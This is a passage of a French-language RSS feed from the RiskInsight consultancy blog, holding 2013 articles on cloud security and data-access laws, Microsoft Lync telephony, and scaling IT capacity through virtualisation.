<p>Un outillage commence à voir le jour pour aider les entreprises à évaluer les risques et le niveau de sécurité inhérent. En France, l’ANSSI (Agence Nationale de la Sécurité des Systèmes d’Information) a publié un guide pour accompagner les démarches de type <em>Cloud computing</em>. Au niveau européen, l’ENISA (European Network and Information Security Agency) fournit une analyse générique mais complète des risques liés au <em>Cloud</em>. Enfin, outre- Atlantique, l’association Cloud Security Alliance, qui regroupe les acteurs majeurs, a mis au point la <em>Cloud Controls Matrix</em>. Cette matrice permet de comparer de nombreux fournisseurs sur des critères de sécurité précis. Bien que fondée sur les seules déclarations desdits fournisseurs, elle peut s’avérer utile pour comparer les offres.</p>
<h4>Le chiffrement : graal de la sécurité <em>Cloud </em>?</h4>
<p>Parmi les solutions techniques permettant de réduire les risques du <em>Cloud</em>, le chiffrement se positionne en tête. Et si aujourd’hui son utilisation nécessite souvent de donner les clés de déchiffrement au fournisseur, des innovations technologiques se profilent. Elles permettront de transférer et de traiter des données à distance sans jamais donner au fournisseur d’accès direct. Bien qu’encore expérimentales, ces techniques, rassemblées sous la bannière du <a title="Chiffrement : la clé d’un cloud computing sécurisé ?" href="http://www.solucominsight.fr/2013/05/chiffrement-la-cle-dun-cloud-computing-securise/">chiffrement homomorphique</a>, méritent qu’on les suive avec attention.</p>
<h4>Ne pas mettre ses responsabilités dans les nuages</h4>
<p>Contrairement à ce que trop d’entreprises pensent, leur responsabilité ne s’arrête pas une fois la solution <em>Cloud</em> mise en production. Si le fournisseur est tenu de respecter un certain nombre</p>
<p>de règles de sécurité, le maintien du niveau de protection dans le temps relève aussi de la  responsabilité de l’entreprise. Pour cela, les bonnes pratiques appliquées au SI d’entreprise doivent être transposées au <em>Cloud</em> : gouvernance de la sécurité (processus, sensibilisation des utilisateurs), administration fonctionnelle de la sécurité, configuration des options de sécurité avancées, restriction des droits requis par les utilisateurs, formation des administrateurs, revue régulière des paramètres de configuration… Ceci est particulièrement vrai pour la gestion des identités et des accès, élément clé pour garantir la confidentialité des données dans le <em>Cloud</em>.</p>
<p><strong><em> </em></strong></p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/12/securite-et-cloud-un-mariage-de-raison/">Sécurité et Cloud, un mariage de raison</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>De l’outil collaboratif à la téléphonie, Lync peut-il trouver sa place en entreprise ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/12/de-loutil-collaboratif-a-la-telephonie-lync-peut-il-trouver-sa-place-en-entreprise/</link>
		
		<dc:creator><![CDATA[Victoire Perrin]]></dc:creator>
		<pubDate>Thu, 12 Dec 2013 15:54:50 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Métiers - Telcos]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[IM]]></category>
		<category><![CDATA[Lync]]></category>
		<category><![CDATA[messagerie d'entreprise]]></category>
		<category><![CDATA[messagerie instantanée]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Office 365]]></category>
		<category><![CDATA[téléphonie]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=4750</guid>

					<description><![CDATA[<p>Au cours de la dernière décennie, deux mondes ont évolué en parallèle au sein du marché de la communication en entreprise : d&#8217;une part les solutions orientées téléphonie, des « Pure Players » (Alcatel, Aastra…) aux entreprises issues du monde de la...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/12/de-loutil-collaboratif-a-la-telephonie-lync-peut-il-trouver-sa-place-en-entreprise/">De l’outil collaboratif à la téléphonie, Lync peut-il trouver sa place en entreprise ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="text-align: left;" align="center"><em>Au cours de la dernière décennie, deux mondes ont évolué en parallèle au sein du marché de la communication en entreprise : d&rsquo;une part les solutions orientées téléphonie, des « Pure Players » (Alcatel, Aastra…) aux entreprises issues du monde de la data (Cisco…), et d&rsquo;autre part les éditeurs d&rsquo;outils collaboratifs orientés poste de travail (Microsoft, IBM&#8230;). Suite à la convergence des services de téléphonie vers des solutions IP, ces deux mondes empiètent sur leurs plates-bandes respectives, et la brique de téléphonie Lync en est le parfait exemple, Microsoft s&rsquo;aventurant là où d&rsquo;autres solutions de téléphonie concurrentes ont déjà fait leurs preuves. Malgré une intégration forcément optimale avec son système de messagerie instantanée (IM), et souvent déployé dans de nombreuses entreprises pour ce seul usage, Lync a-t-il réellement sa place sur le marché de la téléphonie en entreprise ?</em></p>
<h2>La téléphonie Lync, un démarrage difficile</h2>
<p>Microsoft Office Communicator, lancé en 2007 et permettant des échanges en temps réel entre collaborateurs (IM, appels audio/vidéo, présence), devient <strong>Lync</strong> en 2010 (contraction de « Link » et « Sync »). Ce nouveau produit offre à Microsoft l&rsquo;opportunité de faire son entrée dans le monde convoité de la <strong>téléphonie</strong> et des <strong>communications unifiées</strong>. En se basant sur son historique et son expertise reconnus sur les solutions logicielles collaboratives, Microsoft anticipe une adoption rapide de cette nouvelle brique téléphonie. Cependant, de 2010 à 2012, <strong>Lync a du mal à convaincre</strong> les Grands Comptes qui ne se sentent pas prêts à jouer les pilotes sur une fonctionnalité aussi critique que la téléphonie, avec un produit sur lequel les intégrateurs n’ont pas vraiment d’expérience.</p>
<p>Moins d’un an après les premiers déploiements à grande échelle, la question la plus fréquemment posée est encore « <strong>quels avantages aurais-je à utiliser la téléphonie Lync ?</strong>« . Une question qui mérite d&rsquo;être posée au vu de l&rsquo;intérêt croissant des entreprises pour les outils collaboratifs &#8211; et de fait toute solution les englobant.</p>
<h2>Des fonctionnalités distinctes selon le type de licence</h2>
<p><a href="http://www.solucominsight.fr/2013/12/de-loutil-collaboratif-a-la-telephonie-lync-peut-il-trouver-sa-place-en-entreprise/ecran-virtuel-au-mur/" rel="attachment wp-att-4751"><img loading="lazy" decoding="async" class="alignleft  wp-image-4751" title="ecran virtuel au mur" src="http://www.solucominsight.fr/wp-content/uploads/2013/12/ecran-virtuel-au-mur.jpg" alt="" width="237" height="165" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2013/12/ecran-virtuel-au-mur.jpg 339w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/12/ecran-virtuel-au-mur-274x191.jpg 274w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/12/ecran-virtuel-au-mur-56x39.jpg 56w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/12/ecran-virtuel-au-mur-245x170.jpg 245w" sizes="auto, (max-width: 237px) 100vw, 237px" /></a>Lync a été pensé pour différents usages, traduits par <strong>différents niveaux de licences cumulatives</strong>. La licence <strong>Standard</strong> supportant les fonctions « basiques » &#8211; IM, présence, appels audio/vidéo poste à poste, <a title="Telcospinner - Skype et Lync : à la croisée des chemins" href="http://www.telcospinner-solucom.fr/2013/07/skype-et-lync-a-la-croisee-des-chemins/" target="_blank">interconnexion Skype</a> -, il faudra investir dans la licence <strong>Enterprise</strong> afin d&rsquo;avoir accès à l&rsquo;organisation de réunions, de conférences audio, vidéo ou web. Enfin une souscription supplémentaire à la licence <strong>Plus</strong> donnera accès aux fonctions de téléphonie telles que les appels vers/depuis l&rsquo;extérieur de l&rsquo;entreprise, les renvois d&rsquo;appel, les groupes de réponse, la délégation patron/secrétaire ou encore les appels d&rsquo;urgence.</p>
<p>La licence Plus permet réellement <strong>d&rsquo;utiliser le poste de travail comme élément central de la téléphonie</strong>, en s’appuyant sur différents périphériques. Il est envisageable d&rsquo;utiliser <strong>les haut-parleurs et le micro de l&rsquo;ordinateur</strong>, ce qui n&rsquo;engage aucun frais de matériel supplémentaire (sauf pour certains PC/Mac fixes) mais nécessite en revanche des composants de bonne qualité et un environnement sonore extrêmement calme. <strong>Le casque audio USB ou sans-fil</strong> est souvent le meilleur investissement, permettant une qualité sonore appréciable dans la plupart des cas. Un <strong>téléphone physique relié en USB</strong>, sans aucune intelligence embarquée, peut être également mis en place. Dans ces deux derniers cas, l&rsquo;extinction du PC entraîne bien entendu la désactivation du périphérique audio.</p>
<p>Semblables aux solutions classiques de ToIP, des <strong>téléphones IP</strong> <em>stand-alone</em> peuvent aussi être utilisés, une fois reliés au même compte Lync que celui auquel est connecté le client PC/Mac. Il est alors toujours possible de recevoir et émettre des appels, même avec un PC éteint. Pour les usages en salle de réunion, les <strong>Meeting-Phones</strong> (ou « Pieuvres audioconférence ») seront préférées, tandis que les solutions naissantes <strong>DECT</strong> et <strong>téléphones Wi-Fi</strong> seront destinées aux usines et aux gardiens, embarquant des fonctions avancées telles que la détection d&rsquo;homme à terre.</p>
<p>La version mobile, <strong>Lync Mobile 2013</strong> permet de retrouver la plupart des fonctionnalités offertes par le client (IM, appels audio/vidéo sur IP, partage de présentation PowerPoint réunions en ligne…) sur smartphone ou tablette iOS, Android ou Windows Phone à travers les applications dédiées. À noter que cette version 2013 permet de <strong>réels appels Lync</strong> (qui rejoignent le réseau de l&rsquo;entreprise à travers le serveur Edge et le Reverse Proxy) via Wi-Fi ou 3G/4G.</p>
<h2>Du point de vue de l&rsquo;architecture et du sourcing<strong> ?</strong></h2>
<p><span style="font-size: 13px;">Au niveau architecture globale, </span><strong style="font-size: 13px;">Lync ne diffère pas réellement</strong><span style="font-size: 13px;"> des solutions que peuvent proposer les autres constructeurs de téléphonie, si ce n&rsquo;est que l&rsquo;ensemble des services peut être concentré sur un seul serveur (« Front End »), là où d&rsquo;autres solutions pourraient nécessiter un serveur par application.</span></p>
<p>Microsoft a également profité de la montée de version majeure de Lync (2010 à 2013) pour faire ses premiers pas dans le <strong>Cloud</strong> en proposant non plus un seul modèle d&rsquo;architecture physique (« <strong>Server</strong> » ou « <strong>On</strong> <strong>Premise</strong>« ) mais également une version « <strong>Online</strong>« , avec la possibilité de mettre en place une architecture « hybride » mixant les deux solutions.</p>
<p style="text-align: center;"><img loading="lazy" decoding="async" class=" wp-image-4759 aligncenter" title="Lync server and online" src="http://www.solucominsight.fr/wp-content/uploads/2013/12/Lync-server-and-online.png" alt="" width="221" height="99" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2013/12/Lync-server-and-online.png 394w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/12/Lync-server-and-online-71x32.png 71w" sizes="auto, (max-width: 221px) 100vw, 221px" /></p>
<p>Si la plupart des fonctions de base sont supportées dans les trois versions, <strong>seule la version Server permet l&rsquo;activation de la téléphonie</strong>. A l&rsquo;instar de ses concurrents, Lync permet une connexion au Réseau Téléphonique Commuté (RTC) centralisée ou en local via des passerelles. Sur les sites où la téléphonie a un impact direct sur les métiers (centres d&rsquo;appels notamment), il est <strong>possible d&rsquo;installer en sus de la passerelle un serveur Lync Standard Edition (SE)</strong> ou une <strong>Survivable Branch Appliance (SBA)</strong> pour conserver l&rsquo;ensemble de fonctions de téléphonie avancées en cas de perte du WAN (groupes de réponses, conférences,…).</p>
<p>À noter que <strong>Microsoft n&rsquo;est pas fournisseur de ces passerelles</strong>, contrairement à Cisco qui fabrique ses propres « Cisco Integrated Services Routers ». L&rsquo;entreprise de Redmond oriente alors ses clients vers des fournisseurs homologués tels que AudioCodes ou encore Sonus (ex-NET). Il est également important de savoir que l&rsquo;offre <strong>Lync Online </strong>(à travers la solution <strong>Office 365</strong>) <strong>ne supporte pas la téléphonie</strong>.</p>
<div>
<p><strong>L</strong><strong>a téléphonie dans le Cloud</strong> (ou <strong>téléphonie « As A Service »</strong>) est envisageable aujourd&rsquo;hui, mais <strong>sous forme d&rsquo;une offre On-Premise hébergée chez un tiers</strong> (Orange, Verizon). L&rsquo;entreprise loue alors le service de téléphonie, tout en ayant le choix de conserver ou non la partie Exchange au sein de son propre datacenter. Par ailleurs, lors de la première Lync Conférence France (12 novembre 2013), Microsoft a déclaré que la téléphonie dans le Cloud serait proposée « à moyen terme » dans l&rsquo;offre Online.</p>
<p>&nbsp;</p>
<p>La téléphonie Lync commence donc à prouver qu&rsquo;elle a sa place sur le marché de la téléphonie d&rsquo;entreprise, alimentant ainsi de nombreuses réflexions chez plusieurs de nos clients Grands Comptes. Afin de faire pencher la balance en son avantage, Microsoft joue la carte de la simplification de l&rsquo;interface utilisateur et de la mise en place de la solution, tentant ainsi de compenser l&rsquo;impact lié au changement d&rsquo;usage. Il est en effet important de garder à l&rsquo;esprit que la téléphonie Lync est une brique à la fois bureautique et téléphonique, qui peut entraîner une modification des habitudes au sein de l&rsquo;organisation originelle. La conduite du changement auprès des utilisateurs et en conséquence du support (casques, téléphones, poste de travail…) devient alors un volet plus qu&rsquo;important dans la mise en place de Lync chez nos clients.</p>
<p><em>[rédigé en collaboration avec Julien Tanguy]</em></p>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/12/de-loutil-collaboratif-a-la-telephonie-lync-peut-il-trouver-sa-place-en-entreprise/">De l’outil collaboratif à la téléphonie, Lync peut-il trouver sa place en entreprise ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Doubler les capacités du SI en 6 mois : prêts à relever le défi ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/10/doubler-les-capacites-du-si-en-6-mois-pret-a-relever-le-defi/</link>
		
		<dc:creator><![CDATA[Jonas Cadillon]]></dc:creator>
		<pubDate>Mon, 21 Oct 2013 15:27:39 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[capacity management]]></category>
		<category><![CDATA[capacity planning]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud computing]]></category>
		<category><![CDATA[Croissance]]></category>
		<category><![CDATA[réduction des coûts]]></category>
		<category><![CDATA[scalabilité]]></category>
		<category><![CDATA[solution intégrée]]></category>
		<category><![CDATA[virtualisation]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=4381</guid>

					<description><![CDATA[<p>L’actualité économique instable de ces dernières années a poussé de nombreuses entreprises à restreindre le budget des DSI et par conséquent les investissements dédiés à moderniser leurs infrastructures vieillissantes. Le contexte ambiant laisse du reste peu de place à l’anticipation…...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/10/doubler-les-capacites-du-si-en-6-mois-pret-a-relever-le-defi/">Doubler les capacités du SI en 6 mois : prêts à relever le défi ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>L’actualité économique instable de ces dernières années a poussé de nombreuses entreprises à restreindre le budget des DSI et par conséquent les investissements dédiés à moderniser leurs infrastructures vieillissantes.</em></p>
<p><em>Le contexte ambiant laisse du reste peu de place à l’anticipation… Les DSI doivent assurer les transformations du SI dans des délais toujours plus courts. Un nouveau marché peut être gagné, un nouveau besoin métier émerger sans que la DSI n’ait beaucoup de temps pour étudier les impacts sur le SI existant et mettre en œuvre la solution adéquate. Comment par exemple absorber en quelques mois une augmentation de 100% du volume de données traitées et faire face à des problématiques de scalabilité horizontale et verticale ? En voici quelques clés.</em></p>
<h2>Gagner du temps en conjugant  les solutions techniques du marché</h2>
<p>Le <em>Cloud</em> public est séduisant sur le papier, la scalabilité étant assurée par l’hébergeur du service. Cette solution est du reste à privilégier pour des services ayant peu de dépendances avec d’autres applications du SI (application RH, gestion de trésorerie&#8230;). La migration de la totalité d’un SI vers ce type d’offres, sans déjà posséder un <a href="http://www.solucominsight.fr/2013/09/quelles-vertus-au-cloud-hybride/">Cloud hybride</a><em>, </em>s’avère en effet très difficile dans des délais serrés.</p>
<p>Les solutions intégrées, de leur côté, incluant à la fois le matériel et le logiciel, sont pertinentes lorsque le parc applicatif (serveur d’applications ou bases de données) est homogène et que le besoin de montée en capacité concerne plusieurs applications. L’investissement est bien sûr conséquent et le choix structurant pour le SI, mais le gain de temps n’est pas négligeable lors de la mise en œuvre. De plus, ces solutions comportent des mécanismes permettant d’activer de la puissance supplémentaire à la demande, ce qui laisse plus de souplesse pour effectuer le dimensionnement initial des infrastructures.</p>
<p>La virtualisation est pour finir une solution plus adaptée en présence d’un parc applicatif hétérogène et fractionné. Les mécanismes fournis par les éditeurs, notamment la copie de machine virtuelle, sont des accélérateurs pour la création des différents environnements d’une même application. La montée en charge des systèmes est quant à elle facilitée grâce au mécanisme permettant d’ajouter de la mémoire et des processeurs virtuels en quelques clics. Le rajout d’un nouveau nœud dans un <em>cluster </em>existant reste également une opération simple et maîtrisée par les exploitants. La virtualisation est en un mot de loin la solution privilégiée par les clients devant faire évoluer un existant.</p>
<h2>Anticiper et sécuriser la transformation grâce au <em>capacity management</em></h2>
<p>La souplesse et les gains de temps offerts par les solutions présentées précédemment ne doivent pas faire oublier l’importance d’évaluer les besoins en capacité et performance.</p>
<p>Les services sollicitant fortement les processeurs ou la mémoire (bases de données à forte volumétrie, <em>batchs</em>, calculs scientifiques…) ne sont pas les candidats idéaux pour la virtualisation. Il faudra donc dimensionner les futurs serveurs physiques exécutant ces applications avec minutie.</p>
<p>Concernant les chantiers de refonte du SAN et du cœur LAN, notre marge de manœuvre est également réduite, ces éléments centraux étant difficilement évolutifs sans impacter la production. Le <em>capacity management</em> s’avère dans ce cas indispensable pour déterminer si ces équipements doivent être remplacés pour supporter la montée en charge du SI.</p>
<p>In fine, face à des délais serrés, la capacité à s’appuyer et à conjuguer les solutions technologiques du marché  et la connaissance de son parc matériel au travers du <em>capacity management</em> sont les leviers clés pour augmenter sereinement la capacité du SI.</p>
<p>Pour autant, il est essentiel de garder en tête que nul chantier ne peut être mené à bien sans l’implication et la fédération des acteurs aussi bien IT que Métiers qui doivent travailler ensemble à la réussite de ce projet. Pour relever le défi c’est bien ce triptyque gagnant qu’il faut mettre en œuvre.</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/10/doubler-les-capacites-du-si-en-6-mois-pret-a-relever-le-defi/">Doubler les capacités du SI en 6 mois : prêts à relever le défi ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Cloud et sécurité : mythes et réalité (partie 2)</title>
		<link>https://www.riskinsight-wavestone.com/2013/07/cloud-et-securite-mythes-et-realite-partie-2/</link>
		
		<dc:creator><![CDATA[Chadi Hantouche]]></dc:creator>
		<pubDate>Wed, 10 Jul 2013 09:24:23 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[chiffrement]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[données]]></category>
		<category><![CDATA[Patriot Act]]></category>
		<category><![CDATA[protection des données]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3917</guid>

					<description><![CDATA[<p>Comme nous l’avons présenté dans un précédent article, une démarche éclairée permet de choisir un fournisseur de Cloud computing dont l’offre est adaptée au besoin de l’entreprise. Pour autant, même une fois cette démarche menée à bout, plusieurs doutes persistent....</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/07/cloud-et-securite-mythes-et-realite-partie-2/">Cloud et sécurité : mythes et réalité (partie 2)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Comme nous l’avons présenté dans un <a title="Cloud et sécurité : mythes et réalités (partie 1)" href="http://www.solucominsight.fr/2013/06/cloud-et-securite-mythes-et-realites-partie-1/">précédent article</a>, une démarche éclairée permet de choisir un fournisseur de Cloud computing dont l’offre est adaptée au besoin de l’entreprise.</p>
<p>Pour autant, même une fois cette démarche menée à bout, plusieurs doutes persistent.</p>
<p>Si l’actualité récente a fait éclater <a title="Révélations sur les capacités d’écoute et d’action de la NSA aux Etats-Unis (PRISM) : une chance pour le RSSI ?" href="http://www.solucominsight.fr/2013/06/revelations-sur-les-capacites-decoute-et-daction-de-la-nsa-aux-etats-unis-prism-une-chance-pour-le-rssi/" target="_blank" rel="noopener noreferrer">l’affaire PRISM</a> , la réalité des accès aux données est pourtant connue depuis de nombreuses années.</p>
<h2> <strong>Les risques d’accès aux données sont réels, depuis longtemps</strong></h2>
<p>Les quelques années de recul et d’expérience sur le Cloud montrent que les craintes quant à l’accès aux données hébergées à l’étranger sont justifiées.</p>
<p>L’exemple le plus souvent cité est celui du <em>USA PATRIOT Act</em> : sur requête du gouvernement américain et après contrôle par un juge, toute entreprise américaine, ou située sur le sol américain, ainsi que tout citoyen américain (où qu’il soit), se doivent de fournir aux autorités un accès aux données auxquelles ils ont accès. Dans le cas d’une entreprise de droit américain, l’obligation s’étend en dehors du territoire national : si ses infrastructures sont situées en Union Européenne, la loi s’applique.</p>
<p>Le <a href="http://www.syntec-numerique.fr/">Syntec Numérique a publié un éclairage</a> intéressant sur le sujet en avril 2013. On y précise notamment  qu’un contrôle par un juge peut être réalisé avant la divulgation des données… Ou après, donc trop tard pour l’empêcher.</p>
<p>Cette loi pose donc  en théorie le problème de la confidentialité des données. Dans la réalité, ces craintes se justifient principalement si les données manipulées ont un niveau de sensibilité très élevé : étatiques (administrations, défense, etc.), stratégiques pour l’entreprise dans un environnement à forts enjeux concurrentiels, géopolitiques, etc.</p>
<p>Pour autant, et c’est un aspect moins connu, la majorité des gouvernements mondiaux disposent de prérogatives équivalentes. Le grand cabinet d’avocats <a href="http://www.hoganlovells.com/">Hogan Lovells a publié une étude à ce sujet en 2012</a>, incluant notamment un comparatif des législations de 10 grands pays sur l’accès aux données Cloud : beaucoup (dont la France) disposent de prérogatives similaires, parfois plus larges et moins contrôlées.<br />
Pourquoi alors se focalise-t-on généralement sur le USA Patriot Act ? Principalement car les acteurs majeurs du Cloud sont aujourd’hui américains,  donc soumis à la législation américaine.</p>
<p>Cependant, ne considérer que l’aspect strictement légal est encore trop réducteur : l’entreprise doit également se demander si le pays sur le sol duquel ses  données critiques sont hébergées a des intérêts allant dans le même sens que les siens.</p>
<p>Dans tous les cas, les conseils de juristes spécialisés sont indispensables pour avoir une position précise et adaptée.</p>
<h2><sup> </sup>Les fournisseurs français de Cloud computing, solution du problème ?</h2>
<p>Sur le papier, stocker ou traiter ses données chez un prestataire de droit français sur le sol français semble la solution idéale…  en théorie seulement.</p>
<p>En effet, de nombreuses fournisseurs français ont des centres de traitement et de stockage dans le monde entier… Même si vos données n’y sont ni stockées ni traitées, ceux-ci pourraient être connectés aux centres situés sur le sol français (et donc permettre d’y donner accès à distance).</p>
<p>Au-delà des données, se pose la question des équipes décentralisées : un Cloud hébergé en France, mais dont les équipes d’administration sont situées aux quatre coins du monde (par exemple pour fournir un support 24/7) doit également faire l’objet d’attentions.</p>
<p>Une fois encore, tous ces risques sont à relativiser : ils ne concernent que les données réellement sensibles.</p>
<h2>Entre protections juridiques et solutions techniques, la bonne parade reste encore à trouver</h2>
<p>Un moyen de se protéger des divulgations indésirables pourrait consister en l’ajout de clauses contractuelles interdisant à son fournisseur de le faire. Malheureusement, ce dernier risque de ne tenir aucun compte desdites clauses lorsqu’une demande officielle de son gouvernement lui parviendra. Pire, dans le cas des lois américaines, il peut lui être interdit d’avertir le propriétaire des données que celles-ci ont été transmises (il s’agit du principe de <em>gag order</em>).</p>
<p>Dans certains cas, il est possible de prendre certaines précautions très spécifiques. Nous conseillons parfois à nos clients de demander l’isolation de leurs données  dans le datacenter du fournisseur, dans une salle sous alarme dont seule l’entreprise détient la clé. Là encore, cela n’empêchera pas un accès aux données, mais permettra au moins à l’entreprise d’en avoir connaissance.</p>
<p>Une véritable solution pourrait provenir de la technologie : un chiffrement adéquat des données permettrait de s’assurer que même en cas d’accès aux données, celles-ci sont correctement protégées. Cela nécessite des technologies de chiffrement de confiance (par exemple en France, qualifiées par l’ANSSI), afin que les données soient sécurisées sur tout leur parcours : pendant leur transmission sur le réseau, au moment de leur utilisation, et lorsqu’elles sont stockées dans le Cloud.</p>
<p align="left">À ce titre, le<a title="Chiffrement : la clé d’un cloud computing sécurisé ?" href="http://www.solucominsight.fr/2013/05/chiffrement-la-cle-dun-cloud-computing-securise/" target="_blank" rel="noopener noreferrer"> chiffrement dit « homomorphique »</a> constitue une perspective d’avenir intéressante…</p>
<div>
<hr align="left" size="1" width="33%" />
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/07/cloud-et-securite-mythes-et-realite-partie-2/">Cloud et sécurité : mythes et réalité (partie 2)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Cloud et sécurité : mythes et réalités (partie 1)</title>
		<link>https://www.riskinsight-wavestone.com/2013/06/cloud-et-securite-mythes-et-realites-partie-1/</link>
		
		<dc:creator><![CDATA[Chadi Hantouche]]></dc:creator>
		<pubDate>Fri, 07 Jun 2013 07:52:03 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[ANSSI]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[ENISA]]></category>
		<category><![CDATA[protection des données]]></category>
		<category><![CDATA[virtualisation]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3804</guid>

					<description><![CDATA[<p>La sécurité est un sujet récurrent lorsque l’on parle de Cloud, à tel point qu’elle est devenue pour de nombreux fournisseurs un argument de vente. En particulier, la question de la protection des données transmises, traitées et sauvegardées apparaît comme...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/06/cloud-et-securite-mythes-et-realites-partie-1/">Cloud et sécurité : mythes et réalités (partie 1)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>La sécurité est un sujet récurrent lorsque l’on parle de Cloud, à tel point qu’elle est devenue pour de nombreux fournisseurs un argument de vente.</em></p>
<p><em>En particulier, la question de la protection des données transmises, traitées et sauvegardées apparaît comme cruciale. Ces points préoccupent aujourd’hui les experts techniques, les managers d’information, et parfois même les directions des entreprises.</em></p>
<p><em>Le Cloud est-il sûr ? Que risque-t-on en l’adoptant ? Comment y assurer la sécurité de ses données ?</em></p>
<h2>Un service moins cher n’est pas forcément moins sécurisé</h2>
<p>Il faut voir les risques liés au Cloud comme proches de ceux existants sur l’externalisation et la virtualisation avec en particulier la perte de contrôle de ses données et les risques liés aux technologies utilisées (virtualisation des systèmes et des réseaux, automatisation d’un certain nombre de tâches, etc.).</p>
<p>Pourtant, de manière générale, nous constatons en France que le niveau moyen de sécurité des services Cloud est au-dessus du niveau moyen de sécurité des entreprises. Plusieurs facteurs expliquent cela.</p>
<p>Le fait de fournir un service informatique à l’état de l’art (et donc sécurisé) est le métier des acteurs du Cloud. Chez la plupart d’entre eux, la mise en place et le respect des procédures de sécurité fait l’objet d’une attention particulière. Par ailleurs, ils proposent un service industrialisé à de nombreux clients : les bonnes pratiques exigées par l’un peuvent souvent être appliquées à tous.</p>
<p>Ces fournisseurs sont, enfin, plus exposés que la moyenne des entreprises, et ont de vrais enjeux en termes d’image : la découverte de faiblesses de sécurité amène en général à une correction rapide.</p>
<p>Inversement, si un mécanisme de sécurité n’est pas offert par un fournisseur (de base ou en option), il sera malheureusement difficile de l’obtenir : en sécurité comme pour les autres fonctionnalités, les offres Cloud manquent souvent de souplesse.</p>
<p>Attention cependant, contrairement à une idée répandue, toutes les offres Cloud ne se valent pas : de véritables différences peuvent exister d’un fournisseur à un autre.</p>
<h2>Des outils dédiés existent pour évaluer ses risques de sécurité</h2>
<p>D’un point de vue sécurité, la démarche est celle – classique – de l’analyse de risque. Le but est ici d’accompagner les projets de mise en œuvre ou de migration vers le Cloud, et pas de les interdire.</p>
<p>Dans le cas du Cloud, un outillage spécifique commence à apparaître pour réaliser cette analyse. En France, l’ANSSI (Agence Nationale de  la Sécurité des Systèmes d’Information) a publié  un guide<sup>1</sup> pour accompagner les démarches de type Cloud computing. Au niveau européen, l’ENISA (European Network and Information Security Agency) fournit une analyse<sup>2</sup> générique mais complète des risques liés au Cloud.</p>
<p>Outre-Atlantique, l’association Cloud Security Alliance regroupant les acteurs majeurs du Cloud a mis au point son outil Cloud Controls Matrix<sup>3</sup>, qui permet de comparer de nombreux fournisseurs sur des critères de sécurité très précis. Si elle est basée sur les seules déclarations desdits fournisseurs, cette matrice peut néanmoins s’avérer utile.</p>
<h2>Les comparaisons théoriques  ne suffisent pas</h2>
<p>Il est parfois difficile de distinguer ce qui est présenté de ce qui est fait en réalité en termes de sécurité. Plusieurs critères permettent d’évaluer les fournisseurs.</p>
<p>Ils peuvent tout d’abord se prévaloir de différentes certifications : ISO 27001 (très adoptée et quasiment obligatoire aujourd’hui) et ISAE 3402/SAE 16 (très adoptées également, requises pour les groupes cotés aux États-Unis, dans la ligne de SOX). Des démarches spécifiques existent aussi dans certains domaines, comme pour les données de santé en France, ou PCI-DSS pour les données de cartes bancaires.</p>
<p>Pour autant, ces certifications ne sont pas toujours une assurance d’un niveau de sécurité adapté. Lors de la phase de choix des fournisseurs ou durant le projet, il apparaît nécessaire de poser des questions très précises, sans laisser de place à des réponses trop larges ou ambiguës.</p>
